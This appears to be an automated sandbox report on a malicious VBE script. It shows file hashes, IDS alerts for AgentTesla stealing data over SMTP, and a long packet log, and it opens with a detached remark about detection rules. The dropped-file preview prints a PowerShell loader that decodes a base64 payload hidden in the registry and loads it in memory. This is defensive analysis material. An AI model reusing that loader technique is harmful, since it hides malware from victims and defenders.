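The two rules are intentionally independent: the first fires on the process chain even when script-block logging is off, the second fires on the loader text even when PowerShell was started by something other than a script host (the dropper here started a normal interactive PowerShell and typed into it, so the parent relationship alone would not carry the loader text).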
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:Non-ISO extended-ASCII text, with very long lines (875), with CRLF line terminators, with escape sequences
                                                    Category:dropped
                                                    Size (bytes):1665
                                                    Entropy (8bit):4.490045339753992
                                                    Encrypted:false
                                                    SSDEEP:48:E6WQWxZziKyST+OAX+X5XpXKX/XFXoXQXDX5:E6TEZziKySTr4
                                                    MD5:CF03ED750C6C2A1BAA2DE70F41F2746A
                                                    SHA1:5CB38CBECFCA790D6DA1D7AF92DD568D14A142D8
                                                    SHA-256:622F287D823A528B74E61064063E7DB8344B7F61F5F8ED502FCDC54A474E0E5B
                                                    SHA-512:E73560CDAFD3F848ED4303C26876A4D1B8BFE7B1BD6D5D4550584C146DCDE68A77BD6A4380EB58EB843827A1C6637EACA2EE1EA74196C54418B55EE227795F1D
                                                    Malicious:false
                                                    Preview:.[91m> .[0m.[93m[.[33m.[45m.[0m.[33m[.[37mAppDomain.[33m]::.[97mCurrentDomain.[33m..[97mLoad.[33m([.[37mConv.[33m.[45m.[0m.[33m[.[37mAppDomain.[33m]::.[97mCurrentDomain.[33m..[97mLoad.[33m([.[37mConvert.[33m]::.[97mFromBase64String.[33m(.[33m.[45m.[0m.[33m.[45m> .[0m.[33m[.[37mAppDomain.[33m]::.[97mCurrentDomain.[33m..[97mLoad.[33m([.[37mConvert.[33m]::.[97mFromBase64String.[33m((.[90m-join.[33m.[45m .[33m(.[93mGet-ItemProperty.[33m.[45m .[90m-LiteralPath.[33m.[45m .[36m'HKCU:\Software\PPJeBFdmEDGXlnL'.[33m.[45m .[90m-Name.[33m.[45m .[36m's'.[33m)..[97ms.[33m.[45m .[33m|.[33m.[45m .[93mForEach-Object.[33m.[45m .[33m{.[92m$_.[33m[.[97m-1.[90m..-.[33m(.[92m$_.[33m..[97mLength.[33m)]})));.[33m.[45m .[33m[.[37mb.b.[33m]::.[97mb.[33m(.[36m'PPJeBFdmEDGXlnL'.[33m).[0m.tape 1 ..etape 2...[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconho.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhos.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhost.[
                                                    File type:data
                                                    Entropy (8bit):3.9029235707037766
                                                    TrID:
                                                    • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                    • MP3 audio (1001/1) 32.22%
                                                    • Lumena CEL bitmap (63/63) 2.03%
                                                    • Corel Photo Paint (41/41) 1.32%
                                                    File name:Booking_0731520.vbe
                                                    File size:9'826 bytes
                                                    MD5:134984e6d7545ba5eb30563498459f72
                                                    SHA1:58ebeaa8da58484f3fcc371b436243e49e41d507
                                                    SHA256:98b8949bd59e771f6e2cd4366783145ea645fe71d255e92462864551292113a9
                                                    SHA512:8646a60160540e5342169ba4c7d636efd6fd1ed0b7dfb39a0c21cb9f38fe367200a128bf269fa89fe2d8f496194f52347bf8d3cf524e70e4fd646a895ad0b054
                                                    SSDEEP:192:DwlgjmTN5A/gHSf1tVEKriWTJOg+tG/HTKDlSK:cO2pK1tGKmd9E/HTKDlX
                                                    TLSH:DA12E054CE9D01C1F32267C65BDAABD50B2F6D606B0F4AD70C6482C7272EEC1A666F30
                                                    File Content Preview:..#.@.~.^.F.x.M.A.A.A.=.=.v.h.n.B...A.w.N.:.A.f.V.p.V...S.@.#.@.&.E.1.G.h.,.N.E.,.2.D.K.L.+.D.~.l.P.r.n.m.Y.4.J.@.#.@.&.@.#.@.&.6.w.D.r.W...P.3.a.a.V.k.^.r.D.@.#.@.&.@.#.@.&.v.,.e.M.C.P.w.W.x.1.Y.b.G.x.,.w.G.E.M.P...n.s.w.V.m.^.+.M.P.N...d.~.W.1.m.!.D...+
                                                    Icon Hash:68d69b8f86ab9a86
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-12T13:39:42.481624+0100 | 2030171 | ET MALWARE AgentTesla Exfil Via SMTP | 1 | 192.168.2.5 | 49983 | 162.254.34.31 | 587 | TCP
2024-11-12T13:39:42.481624+0100 | 2840032 | ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 1 | 192.168.2.5 | 49983 | 162.254.34.31 | 587 | TCP
2024-11-12T13:39:48.072675+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49704 | 172.67.215.48 | 443 | TCP
2024-11-12T13:39:49.557492+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49705 | 172.67.215.48 | 443 | TCP
2024-11-12T13:39:50.915029+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49706 | 172.67.215.48 | 443 | TCP
2024-11-12T13:40:04.633177+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49709 | 172.67.215.48 | 443 | TCP
2024-11-12T13:40:05.930252+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49712 | 172.67.215.48 | 443 | TCP
2024-11-12T13:40:06.552482+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.5 | 49707 | TCP
2024-11-12T13:40:45.748023+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.5 | 49920 | TCP
2024-11-12T13:41:13.436879+0100 | 2855245 | ETPRO MALWARE Agent Tesla Exfil via SMTP | 1 | 192.168.2.5 | 49983 | 162.254.34.31 | 587 | TCP
2024-11-12T13:41:13.436879+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.5 | 49983 | 162.254.34.31 | 587 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 12, 2024 13:39:47.446396112 CET | 49704 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:47.446449995 CET | 443 | 49704 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:47.446536064 CET | 49704 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:47.448018074 CET | 49704 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:47.448035002 CET | 443 | 49704 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:48.072509050 CET | 443 | 49704 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:48.072674990 CET | 49704 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:48.076066971 CET | 49704 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:48.076075077 CET | 443 | 49704 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:48.076364994 CET | 443 | 49704 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:48.122256041 CET | 49704 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:48.122903109 CET | 49704 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:48.163325071 CET | 443 | 49704 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:48.515608072 CET | 443 | 49704 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:48.515647888 CET | 443 | 49704 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:48.515675068 CET | 443 | 49704 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:48.515705109 CET | 443 | 49704 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:48.515733004 CET | 443 | 49704 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:48.515743017 CET | 49704 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:48.515753984 CET | 443 | 49704 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:48.515784025 CET | 49704 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:48.515805960 CET | 49704 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:48.515810013 CET | 443 | 49704 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:48.515971899 CET | 443 | 49704 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:48.516001940 CET | 443 | 49704 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:48.516005039 CET | 49704 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:48.516012907 CET | 443 | 49704 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:48.516052961 CET | 49704 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:48.636708021 CET | 443 | 49704 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:48.640619040 CET | 443 | 49704 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:48.640655994 CET | 443 | 49704 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:48.640685081 CET | 443 | 49704 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:48.640705109 CET | 49704 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:48.640711069 CET | 443 | 49704 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:48.640722036 CET | 443 | 49704 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:48.640764952 CET | 49704 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:48.640764952 CET | 49704 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:48.640778065 CET | 443 | 49704 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:48.641309023 CET | 443 | 49704 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:48.641366959 CET | 49704 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:48.641375065 CET | 443 | 49704 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:48.684725046 CET | 49704 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:48.684746981 CET | 443 | 49704 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:48.725197077 CET | 49704 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:48.760586977 CET | 443 | 49704 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:48.761461020 CET | 443 | 49704 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:48.761599064 CET | 49704 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:48.774013996 CET | 49704 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:48.774036884 CET | 443 | 49704 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:48.774065018 CET | 49704 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:48.774071932 CET | 443 | 49704 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:48.930536985 CET | 49705 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:48.930582047 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:48.930660963 CET | 49705 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:48.930969954 CET | 49705 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:48.930985928 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:49.557369947 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:49.557492018 CET | 49705 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:49.558756113 CET | 49705 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:49.558765888 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:49.559041977 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:49.559922934 CET | 49705 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:49.603337049 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:49.954081059 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:49.954149961 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:49.954180956 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:49.954211950 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:49.954210997 CET | 49705 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:49.954253912 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:49.954272985 CET | 49705 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:49.954297066 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:49.954335928 CET | 49705 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:49.954339027 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:49.954350948 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:49.954387903 CET | 49705 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:49.954533100 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:49.997205019 CET | 49705 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:49.997246981 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:50.044075966 CET | 49705 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:50.073508978 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:50.080269098 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:50.080305099 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:50.080332994 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:50.080395937 CET | 49705 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:50.080435038 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:50.080451012 CET | 49705 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:50.080522060 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:50.080547094 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:50.080560923 CET | 49705 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:50.080568075 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:50.080601931 CET | 49705 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:50.080607891 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:50.122176886 CET | 49705 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:50.122210979 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:50.169060946 CET | 49705 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:50.192104101 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:50.199172974 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:50.199248075 CET | 49705 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:50.199265003 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:50.199296951 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:50.199331045 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:50.199343920 CET | 49705 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:50.199352980 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:50.199387074 CET | 49705 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:50.199392080 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:50.200248957 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:50.200299025 CET | 49705 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:50.200306892 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:50.200660944 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:50.200702906 CET | 49705 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:50.200709105 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:50.200726986 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:50.200771093 CET | 49705 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:50.200865030 CET | 49705 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:50.200879097 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:50.200891018 CET | 49705 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:50.200896025 CET | 443 | 49705 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:50.303664923 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:50.303719044 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:50.303802967 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:50.305547953 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:50.305560112 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:50.914828062 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:50.915029049 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:50.916233063 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:50.916243076 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:50.916446924 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:50.917325974 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:50.959325075 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.321563005 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.321635962 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.321662903 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.321686983 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.321706057 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:51.321712017 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.321722031 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.321738005 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:51.321763039 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:51.321768999 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.322276115 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.322319984 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:51.322324038 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.372181892 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:51.372189045 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.419049025 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:51.438437939 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.451145887 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.451181889 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.451212883 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.451236963 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.451263905 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.451263905 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:51.451263905 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:51.451280117 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.451330900 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:51.451888084 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.451951981 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:51.451957941 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.497308016 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:51.497318029 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.544095039 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:51.555546045 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.568208933 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.568252087 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.568293095 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.568320990 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.568329096 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:51.568356037 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.568375111 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:51.568437099 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:51.568443060 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.578413010 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.578497887 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:51.578526974 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.603473902 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.603694916 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:51.603718996 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.653445005 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:51.672643900 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.685144901 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.685256004 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:51.685285091 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.685426950 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.685453892 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.685473919 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:51.685480118 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.685504913 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.685545921 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:51.685551882 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.685652971 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:51.695513964 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.695561886 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.695627928 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:51.695651054 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.720660925 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.720774889 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:51.720799923 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.720889091 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:51.802237988 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.802257061 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.802541018 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.802597046 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:51.802597046 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:51.802615881 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.802874088 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:51.812593937 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.812678099 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:51.826220989 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.826308012 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:51.906810045 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.906883001 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:51.920344114 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.920428038 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:51.929939032 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.930111885 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:51.943968058 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:51.944138050 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:52.023957968 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:52.024035931 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:52.037282944 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:52.037349939 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:52.037467957 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:52.046973944 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:52.047046900 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:52.047060013 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:52.047106028 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:52.072065115 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:52.072174072 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:52.072298050 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:52.072350025 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:52.154628992 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
